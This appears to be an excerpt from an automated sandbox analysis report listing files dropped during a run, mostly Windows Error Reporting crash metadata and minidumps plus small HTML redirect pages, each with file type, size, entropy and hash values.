                                                                                                                                                                                                          SHA-512:2A450C3100ECA24B6AF23F29615723D9F5887BE4955C8BE94EAD3DB7A224500CB6EB7EC9557750CE463D75F287A3B57465A1DF838489FFAA18B88AC041C718F3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>7128</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.5142717860888295
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYdYm8M4JCKgwFb+q8dgASHvlvjd:uIjfmI72AAm7VtJCKfS9evlvjd
                                                                                                                                                                                                          MD5:1FEE89B0A8FB1C397186241D590FBB08
                                                                                                                                                                                                          SHA1:C8D581B1718ADDAD8F7B076E920505E162684AFE
                                                                                                                                                                                                          SHA-256:34616F1C4EB82E567328D290D2A4257388DDAE1802CCE99A3A44D452CD4F98C2
                                                                                                                                                                                                          SHA-512:768932BB822E6A7F6FBBED0CB24C6CAC4A4781B89B8F000122EAAD4E8150108343F398EF219D559559B3B41F0112163DA168828DD6A075C53428118A31BDBFBC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:54 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):95868
                                                                                                                                                                                                          Entropy (8bit):1.8233144279177214
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:WQUWRMOh6ZgnRxqrSD8srGjOhMgEUlAfm:WQUiMOh+KREefSQWm
                                                                                                                                                                                                          MD5:20F4FB6F62C9F439FB948E076757A2B8
                                                                                                                                                                                                          SHA1:0934F4D3ABA3259FFC592674ACEF443AEBFABE94
                                                                                                                                                                                                          SHA-256:733B7CCFBC82BCD97A742160F245EA119088A3C611AEB1B0A9A8DE5C550EC9A6
                                                                                                                                                                                                          SHA-512:E6F8EDB2F889E8032BEBF29E3AC00C494D6347B2FB349FAEE04D23E62FF958C5CE5C7C03EF531A29CF87A26B33AEEFF7000C5E38F4AAF0444DC08A2666196F26
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.7040324099213042
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJiv6h6YSsSU9Vbgmfmgprx89bG6sfyCm:R6lXJC6h6YZSU9pgmfmLGZfe
                                                                                                                                                                                                          MD5:0F19D3D89893A7989E485F12D48BFD31
                                                                                                                                                                                                          SHA1:0BA6BC2D45C56AC0ED0D294D492C97C58CFEE639
                                                                                                                                                                                                          SHA-256:01E0ED85722A4447AB4A2BFBF7FF8CFF058449DE4A444EDB66A502AC879FABD9
                                                                                                                                                                                                          SHA-512:5573917EDFE4CD742E3D81BDC6C67728FB2E0109D053981D3416692AAA46DF7C516720B4A9E9EED33E806B4F2C79B9452AB9FA5599E3E78C5127EC5264210B9C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6048</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.513868523139754
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYiRYm8M4JCKgwFhi+q8dghcJSHvlvyd:uIjfmI72AAm7VYJCKliSacJevlvyd
                                                                                                                                                                                                          MD5:3E9B2B15B3B162336F12B765A6F5A237
                                                                                                                                                                                                          SHA1:12BC9EC0213C2D69EF5F925F8517A7F3FF8F4073
                                                                                                                                                                                                          SHA-256:116DB3B9AC26A03FCC66F100C02ECA7343EC3064089E31F1D8294B36E5FE96D8
                                                                                                                                                                                                          SHA-512:984D3AE0CBEE5664DD66CC7C1EFD8210C82FE91E39E35AD8E72A7CABE56D2E6CC04B9A4119F9951EFBD9BB5791190E9EB62B08E5B61F778E668B68A32CEBF9C3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:39 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):99596
                                                                                                                                                                                                          Entropy (8bit):1.9986291711368998
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:73lKGOzaJuKX48gkepMhmBmdjwAE1hz2wONDkD503:7VKGO+pX48TepM6mpezKNyk
                                                                                                                                                                                                          MD5:F56AD4D5074A2DEB5647A13F37E0D3CE
                                                                                                                                                                                                          SHA1:2AD649BD035451F8602E463C767255E433D4E425
                                                                                                                                                                                                          SHA-256:A06607B359C7DDDC5C2A26F669B3615189B010E780A923FCEC83B63D1955BA4D
                                                                                                                                                                                                          SHA-512:A0C6D7864FBE06A7225F6299CF3C527C3C089FC428887947FF504A77765D1948F3E87C99A7716C552A9B5375DCD22F896C2B9D728C7A58838CB6CBCE5D48BE4A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:39 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):101664
                                                                                                                                                                                                          Entropy (8bit):1.9261637664136209
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:CuG3lmOUeFYSxHYY82g2CINojE1B1FXGV/nTFhyoDdjABWGpa:cVmO6Sxv3C3A1BaVLFhyoDCvp
                                                                                                                                                                                                          MD5:A82200D8E85F9E00787D3997F39ABAF8
                                                                                                                                                                                                          SHA1:9994C142FDB29835B30F3E59D317D625445BC287
                                                                                                                                                                                                          SHA-256:B6D3AE93528A928CB529BB27C9B8EC667DB6289D0B714125F4CFDA01E6B2C4BB
                                                                                                                                                                                                          SHA-512:DC7A650C8DB5ACC2A8791BF879237823192FBAD914E0CEE6387F960DF418E0B9DC761C535581CFA5C1E5C2E97AFA4A71BF94E551DEF14B385F6D12D1CAB1463E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.7019951640916378
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJsh6cC6YSsSU97aZs5gmfmgprN89b6LsfA+m:R6lXJC6B6Y5SU9dgmfmP6QfQ
                                                                                                                                                                                                          MD5:EBF64A1506AA6C50E4593C1FBA3047D4
                                                                                                                                                                                                          SHA1:C2641BB6B05702B35F7FF43738844DF73B0B2958
                                                                                                                                                                                                          SHA-256:110E97B2D72D2CA0E86DDA0C4C042E4353AF7824B1EE18A4DD35DF1949C2DD07
                                                                                                                                                                                                          SHA-512:BCC354D985CC7D5B3330F6ADDC913C85401DF524F8E562F76A008383C1BEE6A9B6C34883DF749172C9B01AD3552F1C41BC5F8B485F4A5A501AB425B174B93EE4
                                                                                                                                                                                                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>..<OSVersionInformation>..<WindowsNTVersion>10.0</WindowsNTVersion>..<Build>19045</Build>..<Product>(0x30): Windows 10 Pro</Product>..<Edition>Professional</Edition>..<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..<Revision>2006</Revision>..<Flavor>Multiprocessor Free</Flavor>..<Architecture>X64</Architecture>..<LCID>2057</LCID>..</OSVersionInformation>..<ProcessInformation>..<Pid>5584</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.701901561861991
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJJhJ6R6YSJSU97aZs5gmfmgpr+89b6xsfx+m:R6lXJx6R6YMSU9dgmfmC6qfR
                                                                                                                                                                                                          MD5:F1B2A0A9F6D3D63275A3451EF9B1DE1A
                                                                                                                                                                                                          SHA1:016EBAEA3166849F8C3F3B662B5B1346474947FE
                                                                                                                                                                                                          SHA-256:B79D8EB720337FAB49E2C3D26058A0B127F8D7DDF6C9C287CBEEF0535B10959E
                                                                                                                                                                                                          SHA-512:60DBA14F53C9C8F5F035425F92CB00C22D62092BAC75338763DF9F2D99C144E956C777E2ECA8C9CC454FF8543FE6C4B471FEB9F7B9348AE57510882251136E65
                                                                                                                                                                                                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>..<OSVersionInformation>..<WindowsNTVersion>10.0</WindowsNTVersion>..<Build>19045</Build>..<Product>(0x30): Windows 10 Pro</Product>..<Edition>Professional</Edition>..<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..<Revision>2006</Revision>..<Flavor>Multiprocessor Free</Flavor>..<Architecture>X64</Architecture>..<LCID>2057</LCID>..</OSVersionInformation>..<ProcessInformation>..<Pid>3804</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.513530434502717
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VY9Ym8M4JCKgwFQ1+q8dgVSHvlvLd:uIjfmI72AAm7VxJCKoSkevlvLd
                                                                                                                                                                                                          MD5:498429F3397F1D6D366B06F60F42C719
                                                                                                                                                                                                          SHA1:8B6595DC70CFBD7BCE58AACFDFEB9727B89EDDBB
                                                                                                                                                                                                          SHA-256:B31F33B97584515087903B8DD8E5124D65355265D02EACC8761ACC049F947E13
                                                                                                                                                                                                          SHA-512:1FE50291246952646EAE50CBC267F025F0160F18985672ECB20AEB750457C7E5A29B5164C0E10F113FCD01D804C68B7AD4E962B5E2E2DE5445D72B7744B33581
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.511181271883728
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYyYm8M4JCKgwFQ0j+q8dgASHvlvydd:uIjfmI72AAm7VqJCKUcSxevlvydd
                                                                                                                                                                                                          MD5:2A227C8CF79D972D6A0CB03C7D2B8752
                                                                                                                                                                                                          SHA1:D85346C3FBA009C3F81EE633211A0E1D1FE85D87
                                                                                                                                                                                                          SHA-256:50473E9819A8CA08B3832463BBAEC5592DDD990BD3CE4D42EDEF59E87728D7DC
                                                                                                                                                                                                          SHA-512:7FD843353E48EA2569B8AC90EB5D1C301CD8A61FE1F2D110E69529CCE480FAAB1D370288F55EEADC2D5B44CD68F030F395C20231EB7193FF5AB059A5786BCC72
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:42 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):99508
                                                                                                                                                                                                          Entropy (8bit):1.946110054792765
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:H83l6Onrc8OguIN9dJ09IaMdt33uHbHTL6Ga2yHI7+BOq:cV6Or/Ogu09dJ0Eb33u7zLKs7+B
                                                                                                                                                                                                          MD5:26F141CFBAF874899DE0735F3D7EED36
                                                                                                                                                                                                          SHA1:21BCBC3D1E038CAFB6C1ABE2A0E8D0E4091334CF
                                                                                                                                                                                                          SHA-256:2120A1B867E0D13F24A8E289D6ABD08F656DEEB0099633E72ED53109EA35EDC9
                                                                                                                                                                                                          SHA-512:C14E123EB32ED3B15DBDB7D5ED7E294AB1E5F77A9FA12EACC4A013011B36CC5FE64E067F56E3E27C18A3E5779AC326C17D6423ABA68A07065711BA35E6AD6F93
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.702139447761712
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJgP6rnW6YSOSU97aZc++Fgmfmgprg89bI1sfYPYm:R6lXJg6a6Y7SU9BBFgmfm4IOfYV
                                                                                                                                                                                                          MD5:F8C7F524BA2FD37B8C3BCC3714EA8ADD
                                                                                                                                                                                                          SHA1:9CF82226BECBC50352408F7C5FEC8628BC0B7DD6
                                                                                                                                                                                                          SHA-256:DD8D0C4B0773EB286376FEB2811C1C327D9FC777A0A7D3BE01B283401766C70D
                                                                                                                                                                                                          SHA-512:8E0F6CD5E69D9BC1B6B448A66A647E89464F614E293A5648E3795C7AC6C8CD29DC12A5BFF5EC3669F94EECCEEC759FCCEC4FB5AD0B5B46C19D199D20009D864B
                                                                                                                                                                                                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>1364</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.513823304893427
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYdvYm8M4JCKgwFbt+q8dgPUSHvlvVd:uIjfmI72AAm7VCyJCKdSUUevlvVd
                                                                                                                                                                                                          MD5:B3032C8BC9D756841397B317D822623B
                                                                                                                                                                                                          SHA1:C95CC45713F9DB98885105FF5C872F52B259401F
                                                                                                                                                                                                          SHA-256:507E2E0C2B88B773C783236C66D51E120F86239238760F30E2F7B958C3633BDD
                                                                                                                                                                                                          SHA-512:F7F2D9A80868367B228C027003BB825E6964C2A17FB1B23F41796289DBC392A130EC1E172C9BC3222841F58074756258FA16A831FE438840F28DF9B00D0C4AFE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:42 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):71508
                                                                                                                                                                                                          Entropy (8bit):1.8864298261074235
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:k5mBezMeOa/f5gH9Rhu/4iZQTGkf47ML:FEoeOaZKRhu/4W7M
                                                                                                                                                                                                          MD5:60762F8F38B599E0C86619509CAF16F7
                                                                                                                                                                                                          SHA1:B70B98BB85A124D3B01F45C638FE0233F1B01725
                                                                                                                                                                                                          SHA-256:E5670DF893E7578ECC5C7273615081E883637A7E46A5DE6425A6D1B97FEBA44D
                                                                                                                                                                                                          SHA-512:B2B2CCA25A3A9AB6E291E2D172A8AF91E1F99CD74E8231448E00082F1EB910A9AD9470E35388D172F7485A53B50327302FBAD46DE13746A3D4425832A2518832
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.703294762778584
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJB26DT6e6YS6SU97aZc++Fgmfmgpra89bIdsfVcYm:R6lXJA6D6YfSU9BBFgmfmGIWfVC
                                                                                                                                                                                                          MD5:58F5C76A30A4035E49C496474B3BF815
                                                                                                                                                                                                          SHA1:32397C8618CC0C45BD814681D418F35EC735BD8E
                                                                                                                                                                                                          SHA-256:9FFFD43A8CAECC98C0B855CBB41A4500C4F3D1F392362A6E7CAA6DB110B2EEE1
                                                                                                                                                                                                          SHA-512:18B03DB2429BD7B7C2E3899177AB7AD5F6DADD686867D74B119D3C2772C4916427E130716E9102A38518BA78B82F531D1CE55171693375D67ED61DE55D8F047A
                                                                                                                                                                                                          Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>2232</Pi
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.512457049787961
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VY5Ym8M4JCKgwFx/dc+q8dglSHvlvkd:uIjfmI72AAm7VlJCK9VcScevlvkd
                                                                                                                                                                                                          MD5:C97D871C610CA6A237BFE60F04DD8589
                                                                                                                                                                                                          SHA1:D4B8E6FA6C3969C0E3A068D843366396B6086C7E
                                                                                                                                                                                                          SHA-256:7FF601BFA546BA8C0985A5C28E61387D432DF264551400E8208009DE825F3586
                                                                                                                                                                                                          SHA-512:4D923B7A567C741EAE0D5E1C09CF4D5A4B66AFBB381F9360B85FE9F4671071B5EC987E19978250C874E4D28604306EF666F96826C87E0C5D3FC576C3F193062E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
